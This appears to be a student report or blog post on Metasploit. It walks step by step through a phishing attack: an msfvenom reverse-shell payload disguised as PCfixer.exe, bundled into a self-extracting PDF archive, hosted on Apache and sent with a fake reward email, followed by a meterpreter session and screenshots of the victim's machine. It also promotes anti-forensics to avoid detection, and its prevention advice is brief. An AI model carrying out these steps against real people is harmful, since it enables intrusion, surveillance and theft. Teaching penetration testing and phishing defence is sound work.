Metasploit is a part of Linux, which is used to perform penetration testing. The Metasploit is the system that helps to write, verify and execute exploit code. It is the most common tool that is used for penetration testing as it is an open-source project. It was established in 2003 by HD Moore for use as a Perl -based port network tool. Metasploit is commonly used by ethical hackers and critical hackers as it can be used for various payloads, libraries and exploits that are very powerful for exploiting a system. Metasploit is a cross-platform that supports different platforms like Windows, Mac, Linux so it is considered one of the best tools for penetration testing.
In order to be undetected, we should also execute anti-forensic techniques while we perform the penetration testing into the victim's system. Anti-forensic is the strategy that masks the attacker's data and secretly allows access to conduct action on the victim's computer. Anti-forensic has many forms of evidence hiding, item cleaning, steganography, Trail Obfuscation and many more to be shielded from detection.
Basic terminologies related to Metasploit are described briefly below: -
Vulnerability: Vulnerability can be defined as the weakness in the system which helps the intruder or pen-tester to take advantage of the system's stability.
Payload: The payload is a part of the code that does what we want to do. It provides us a reverse connection, installs and executes something on a target device in this situation.
Module: It is a program compilation that incorporates and builds a complete structure. Each module has its own features, such as: the attack is carried out by the exploit module, the auxiliary module contains functions such as scanning and system enumeration. These modules can be interchangeable according to their requirements.
Exploit: It is a code collection that enables an intruder to use the system's usable vulnerabilities. Any hack has its own flaw to be taken advantage of by an attacker or pen-tester.
Anti-Forensics: Anti-forensics is a method used by cybercriminals to challenge the mechanisms of gathering of evidence and review. The primary aim of anti-forensic techniques is to make a digital investigation difficult or even impossible for a cyber forensic investigator to perform.
1.1. Aims and Objectives
1.1.1.1. Aims
The main aim of this report is to learn about the Metasploit and the process of implementation of different payloads for penetration testing and anti-forensic.
1.1.1.2. Objectives
The objectives of this report are as follows: -
To research and develop skills in the relevant topic
To understand the ways to prevent the attack.
To get familiar with Metasploit
To access the victim’s computer creating a backdoor.
2. Background and Literature Review
2.1. Background
The Metasploit is the system that helps to write, verify and execute exploit code. With the support of developer Matt Miller, Metasploit was developed by HD Moore in 2003 as a Perl-based portable network tool. By 2007, the entire code for Metasploit was translated to Ruby. In 2009, Rapid7 purchased the Metasploit project, where it remains part of a Boston-based organization offering centralized vulnerability detection solutions. For pen testers, it was complicated because they had to execute all the probes manually by using different methods that the platform being tested might or may not help. Pen testers had to design their own code and validate it on networks manually. The original project, containing just 11 exploits, has expanded with more than 1,500 exploits and 500 payloads on an intensive basis.
2.1.1.1. Kali Linux
Kali Linux is a Linux distribution focused on Debian, targeted at sophisticated penetration testing and security auditing. Kali provides several hundred resources for numerous cybersecurity activities, including penetration testing, vulnerability analysis, application forensics, and reverse engineering. In this project Kali Linux is used for creating payload using Metasploit
2.2. Literature Review
2.2.1.1. Case study
“Fake President Scam”
In 2015 Jan 19 FACC’s company was hit by a cyber fraud which cost it 42 million euros ($47 million), as a result the head of Austrian aerospace parts manufacturer FACC was fired. FACC was hit by a cyber scam in which, by posing as Stephan in an email, hackers took about 50 million euros as the spoof email requested an employee to send cash to a fake acquisition project account. There was no hacking into FACC's infrastructure. The intruder seems to have clearly correctly guessed Stephan's email, generated a look-alike spoof email address, and then attacked an accountant at the entry level. The staff instinctively trusted the email and sent fund and the company scrambled to regain the funds, ultimately recovering about one-fifth of the loss.as emails is the one of the most commonly used in phishing attacks as every communication has been using the emails. This case study shows that phishing attacks can be so simple but may cost millions of dollars if not taken seriously.
2.2.1.2. Analysis
This case study shows that the simple mistake by the staff to misunderstand the fake spoofed email as a real cost about 50 million euros. In this case the hacker simply used the phishing scam This case study was selected as sample to build this project's window-based backdoor. The code was attached to the pdf file in this project and was sent to the user by email, as in the case study above. The meterpreter payload was developed in the project using Metasploit. Metasploit offers excellent ways to test for bugs in a device. Since it's a versatile open-source tool that both black hat hackers and ethical hackers might use. Metasploit has made penetration testing simpler and has helped improve a system's security.
2.2.1.3. Scenario
At first a meterpreter payload file was created using Metasploit that had the host IP address and the port for creating backdoor in the victims computer and the file was attached to the pdf file contain fake reward message and sent to the victim through email.as the victim opens the email and click on the link it downloads the payload along with the pdf file as the file is opened the backdoor is also activated and the attacker will gain the remote access to the victims computer and can do multiple tasks like collecting personal information’s. access to the webcam, microphone and all the files and folders of the victim’s computer.
3. Demonstration
A meterpreter payload file was initially generated using Metasploit create backdoor on the victim device and the file was attached to the pdf file containing fake reward redeem and sent to the victim by email. When the victim opens the email and clicks on the link, the payload is downloaded along with the pdf file as the backdoor is opened. Access to the webcam, audio and all of the victim's computer files and folders. And all the steps are as follows: -
3.1. Step 1 Creating a payload using msfvenom
At first the terminal is opened in the kali Linux and payload created with msfvenom by using the following command.
Command:msfvenom-pWindows/meterpreter_reverse_tcp LHOST=192.168.254.6 LPORT=1591 -f exe > PCfixer.exe
LHOST= The IP of a host machine.
LPORT= any port number
 |
Figure 1 Giving commands to create payloads using msfvenom |
3.2. Step 2 Archiving the payload with pdf file using SFX archive
After the payload is created, we copy the file to the windows and archive it with a pdf file to make it look more normal file by archiving the file using SFX archiving that can self-extract the file when the user opens the file and start to run the payload in background.
.png) |
Figure 2 merging the payload with pdf |
.jpg) |
Figure 3 SFX archiving for payload |
After the payload is merged with the pdf file the new file is copied or moved to the /var/www/html/ directory for hosting it in the apache2 server before that the apache service must be started by using command in terminal.
 |
Figure 5 Starting apache service for hosting the file |
Now start the new terminal and give command msfconsole to start the Metasploit for the completion of the attack. Use the following commands after completion of the msfconsole.
 | |
|
Command: use exploit /multi/handler
Command: set payload windows/meterpreter/reverse_tcp\
 |
Figure 7 Setting the host and port and starting the exploit |
3.3. Step 3 Sending spam email to victim
After all the configurations are completed on the host computer now the actual phishing process start at first compose an email that look as genuine as possible and send it to the victim email so that when the victim opens the link and the download the file we wanted.
 |
Figure 8 Sending span email to victim |
After The mail was sent to the victim and victim opens the mail and sees click here link to download the pdf file. And the start download menu pops up as the file size is very low it seems like a text file.
3.4. Step 4 Accessing the Victim PC
 |
Figure 9 victim download the pdf looking file |
As the pdf file payload itself is triggered at the mean time when the victim opened and the meterpreter session is initiated on the attacker's pc and the attacker gets remote access to the compromised PC successfully.
 |
Figure 10 victim opening the pdf file along with the payload in background |
Once the victim opens the file the victim only sees the contents of the pdf file.
 |
Figure 11 Meterpreter session open on the host computer |
3.5. Step 5 Gathering the necessary information’s from the victim’s computer.
Finally, after meterpreter session is initiated on the attacker's pc and the attacker gets remote access to the compromised PC successfully the attacker can do whatever they want like take a screenshot or get the windows event logs and any information they want until the backdoor is active.
 |
Figure 12taking screenshot of the victim’s desktop |
 |
Figure 13 screenshot of the victim desktop |
 |
Figure 14 viewing the victims IP address and network information |
 |
Figure 15 viewing the process list of the victim |
4. Prevention and Recommendation
The following preventive measures should be considered to prevent such attacks: -
• Install a good antivirus program and always turn on the windows defender or fire wall as it instantly detects the malicious file and remove it before execution of the payloads.
• Never open an email from the unknown sender and open the links attached to the emails as that may redirect to the malicious file that can harm your computer.
• The corporation's staff should be well aware of the security system, ransomware, spam or mail messages, etc. as this may be a danger to the company in every way.
• To deter hackers who have stolen a user's passwords from ever obtaining access, two-factor authentication should be enforced.
• Provide the employees with daily security instruction so that they are aware of phishing scams, ransomware and social engineering risks and can recognize them.
5. Conclusions
Hence, I would like to conclude that by using Metasploit phishing attacks can be done. penetration testing is a systematic approach in which vulnerabilities can be detected. One of the best tools for performing penetration testing is Metasploit. It offers advantages such as financial loss prevention, corporate image protection, constructive elimination of identified danger, and so on. I was able to gain information about the Metasploit system and its use in anti-forensics by completing this article. Metasploit is a powerful tool that can be used in the wrong hands to do great damage.
0 Comments